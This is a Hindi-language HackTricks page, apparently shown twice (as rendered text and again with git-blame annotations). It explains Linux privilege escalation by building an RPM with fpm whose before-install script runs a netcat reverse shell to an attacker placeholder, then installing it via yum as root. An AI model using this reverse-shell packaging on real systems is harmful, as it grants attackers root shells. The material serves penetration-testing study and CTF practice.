hacktricks/linux-unix/privilege-escalation/exploiting-yum.md

<details>

<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>

HackTricks का समर्थन करने के अन्य तरीके:

* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें**](https://peass.creator-spring.com)
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में शामिल हों या [**telegram group**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स शेयर करें।

</details>

yum के आसपास के और उदाहरण [gtfobins](https://gtfobins.github.io/gtfobins/yum/) पर भी पाए जा सकते हैं।

# RPM पैकेज के माध्यम से मनमाने कमांड्स को निष्पादित करना
## पर्यावरण की जांच
इस वेक्टर का लाभ उठाने के लिए उपयोगकर्ता को उच्च विशेषाधिकार वाले उपयोगकर्ता, जैसे कि root, के रूप में yum कमांड्स निष्पादित करने में सक्षम होना चाहिए।

### इस वेक्टर का एक काम करने वाला उदाहरण
इस एक्सप्लॉइट का एक काम करने वाला उदाहरण [daily bugle](https://tryhackme.com/room/dailybugle) रूम में [tryhackme](https://tryhackme.com) पर पाया जा सकता है।

## एक RPM पैक करना
निम्नलिखित खंड में, मैं [fpm](https://github.com/jordansissel/fpm) का उपयोग करके एक RPM में रिवर्स शेल को पैकेज करने की प्रक्रिया को कवर करूंगा।

नीचे दिया गया उदाहरण एक पैकेज बनाता है जिसमें एक before-install ट्रिगर शामिल होता है जिसमें एक मनमानी स्क्रिप्ट होती है जिसे हमलावर द्वारा परिभाषित किया जा सकता है। जब इंस्टॉल किया जाता है, यह पैकेज मनमाने कमांड को निष्पादित करेगा। मैंने प्रदर्शन के लिए एक साधारण रिवर्स नेटकैट शेल उदाहरण का उपयोग किया है, लेकिन इसे आवश्यकता के अनुसार बदला जा सकता है।
```text
EXPLOITDIR=$(mktemp -d)
CMD='nc -e /bin/bash <ATTACKER IP> <PORT>'
RPMNAME="exploited"
echo $CMD > $EXPLOITDIR/beforeinstall.sh
fpm -n $RPMNAME -s dir -t rpm -a all --before-install $EXPLOITDIR/beforeinstall.sh $EXPLOITDIR
```
# शेल प्राप्त करना
ऊपर दिए गए उदाहरण का उपयोग करते हुए और मान लें कि `yum` को उच्च-विशेषाधिकार प्राप्त उपयोगकर्ता के रूप में निष्पादित किया जा सकता है।

1. **होस्ट पर rpm ट्रांसफर करें**
2. **अपने स्थानीय होस्ट पर एक लिसनर शुरू करें** जैसे कि [नेटकैट लिसनर का उदाहरण](/shells/shells/linux#netcat)
3. **वल्नरेबल पैकेज इंस्टॉल करें** `yum localinstall -y exploited-1.0-1.noarch.rpm`

<details>

<summary><strong> AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>

HackTricks का समर्थन करने के अन्य तरीके:

* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** पर मुझे 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) **का अनुसरण करें**।
* **अपनी हैकिंग ट्रिक्स साझा करें** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके।

</details>
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00			`<details>`

Translated ['linux-unix/privilege-escalation/docker-breakout.md', 'linux 2024-01-07 00:17:49 +00:00			`<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['linux-unix/privilege-escalation/docker-breakout.md', 'linux 2024-01-07 00:17:49 +00:00			`HackTricks का समर्थन करने के अन्य तरीके:`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['linux-unix/privilege-escalation/docker-breakout.md', 'linux 2024-01-07 00:17:49 +00:00			`* यदि आप चाहते हैं कि आपकी कंपनी का विज्ञापन HackTricks में दिखाई दे या HackTricks को PDF में डाउनलोड करें, तो [सब्सक्रिप्शन प्लान्स](https://github.com/sponsors/carlospolop) देखें!`
			`* [आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें](https://peass.creator-spring.com)`
			`* [The PEASS Family](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [NFTs](https://opensea.io/collection/the-peass-family) का संग्रह`
			`* 💬 [Discord group](https://discord.gg/hRep4RUj7f) में शामिल हों या [telegram group](https://t.me/peass) में या Twitter 🐦 पर मुझे फॉलो करें [@carlospolopm](https://twitter.com/carlospolopm).`
			`* HackTricks के [github repos](https://github.com/carlospolop/hacktricks) और [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स शेयर करें।`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`

Translated ['linux-unix/privilege-escalation/docker-breakout.md', 'linux 2024-01-07 00:17:49 +00:00			`yum के आसपास के और उदाहरण [gtfobins](https://gtfobins.github.io/gtfobins/yum/) पर भी पाए जा सकते हैं।`
Add exploiting-yum page 2020-11-26 04:33:08 +00:00
Translated ['linux-unix/privilege-escalation/docker-breakout.md', 'linux 2024-01-07 00:17:49 +00:00			`# RPM पैकेज के माध्यम से मनमाने कमांड्स को निष्पादित करना`
			`## पर्यावरण की जांच`
			`इस वेक्टर का लाभ उठाने के लिए उपयोगकर्ता को उच्च विशेषाधिकार वाले उपयोगकर्ता, जैसे कि root, के रूप में yum कमांड्स निष्पादित करने में सक्षम होना चाहिए।`
Add exploiting-yum page 2020-11-26 04:33:08 +00:00
Translated ['linux-unix/privilege-escalation/docker-breakout.md', 'linux 2024-01-07 00:17:49 +00:00			`### इस वेक्टर का एक काम करने वाला उदाहरण`
			`इस एक्सप्लॉइट का एक काम करने वाला उदाहरण [daily bugle](https://tryhackme.com/room/dailybugle) रूम में [tryhackme](https://tryhackme.com) पर पाया जा सकता है।`
Add exploiting-yum page 2020-11-26 04:33:08 +00:00
Translated ['linux-unix/privilege-escalation/docker-breakout.md', 'linux 2024-01-07 00:17:49 +00:00			`## एक RPM पैक करना`
			`निम्नलिखित खंड में, मैं [fpm](https://github.com/jordansissel/fpm) का उपयोग करके एक RPM में रिवर्स शेल को पैकेज करने की प्रक्रिया को कवर करूंगा।`
Add exploiting-yum page 2020-11-26 04:33:08 +00:00
Translated ['linux-unix/privilege-escalation/docker-breakout.md', 'linux 2024-01-07 00:17:49 +00:00			नीचे दिया गया उदाहरण एक पैकेज बनाता है जिसमें एक before-install ट्रिगर शामिल होता है जिसमें एक मनमानी स्क्रिप्ट होती है जिसे हमलावर द्वारा परिभाषित किया जा सकता है। जब इंस्टॉल किया जाता है, यह पैकेज मनमाने कमांड को निष्पादित करेगा। मैंने प्रदर्शन के लिए एक साधारण रिवर्स नेटकैट शेल उदाहरण का उपयोग किया है, लेकिन इसे आवश्यकता के अनुसार बदला जा सकता है।
Add exploiting-yum page 2020-11-26 04:33:08 +00:00			```text
			`EXPLOITDIR=$(mktemp -d)`
			`CMD='nc -e /bin/bash <ATTACKER IP> <PORT>'`
			`RPMNAME="exploited"`
			`echo $CMD > $EXPLOITDIR/beforeinstall.sh`
			`fpm -n $RPMNAME -s dir -t rpm -a all --before-install $EXPLOITDIR/beforeinstall.sh $EXPLOITDIR`
			```
Translated ['linux-unix/privilege-escalation/docker-breakout.md', 'linux 2024-01-07 00:17:49 +00:00			`# शेल प्राप्त करना`
			ऊपर दिए गए उदाहरण का उपयोग करते हुए और मान लें कि `yum` को उच्च-विशेषाधिकार प्राप्त उपयोगकर्ता के रूप में निष्पादित किया जा सकता है।
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['linux-unix/privilege-escalation/docker-breakout.md', 'linux 2024-01-07 00:17:49 +00:00			`1. होस्ट पर rpm ट्रांसफर करें`
			`2. अपने स्थानीय होस्ट पर एक लिसनर शुरू करें जैसे कि [नेटकैट लिसनर का उदाहरण](/shells/shells/linux#netcat)`
			3. वल्नरेबल पैकेज इंस्टॉल करें `yum localinstall -y exploited-1.0-1.noarch.rpm`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`<details>`

Translated ['linux-unix/privilege-escalation/docker-breakout.md', 'linux 2024-01-07 00:17:49 +00:00			`<summary><strong> AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['linux-unix/privilege-escalation/docker-breakout.md', 'linux 2024-01-07 00:17:49 +00:00			`HackTricks का समर्थन करने के अन्य तरीके:`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['linux-unix/privilege-escalation/docker-breakout.md', 'linux 2024-01-07 00:17:49 +00:00			`* यदि आप चाहते हैं कि आपकी कंपनी का विज्ञापन HackTricks में दिखाई दे या HackTricks को PDF में डाउनलोड करें, तो [सब्सक्रिप्शन प्लान्स](https://github.com/sponsors/carlospolop) देखें!`
			`* [आधिकारिक PEASS & HackTricks स्वैग](https://peass.creator-spring.com) प्राप्त करें`
			`* [The PEASS Family](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [NFTs](https://opensea.io/collection/the-peass-family) का संग्रह`
			`* 💬 [Discord group](https://discord.gg/hRep4RUj7f) में शामिल हों या [telegram group](https://t.me/peass) में या Twitter पर मुझे 🐦 [@carlospolopm](https://twitter.com/carlospolopm) का अनुसरण करें।`
			`* अपनी हैकिंग ट्रिक्स साझा करें [HackTricks](https://github.com/carlospolop/hacktricks) और [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके।`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`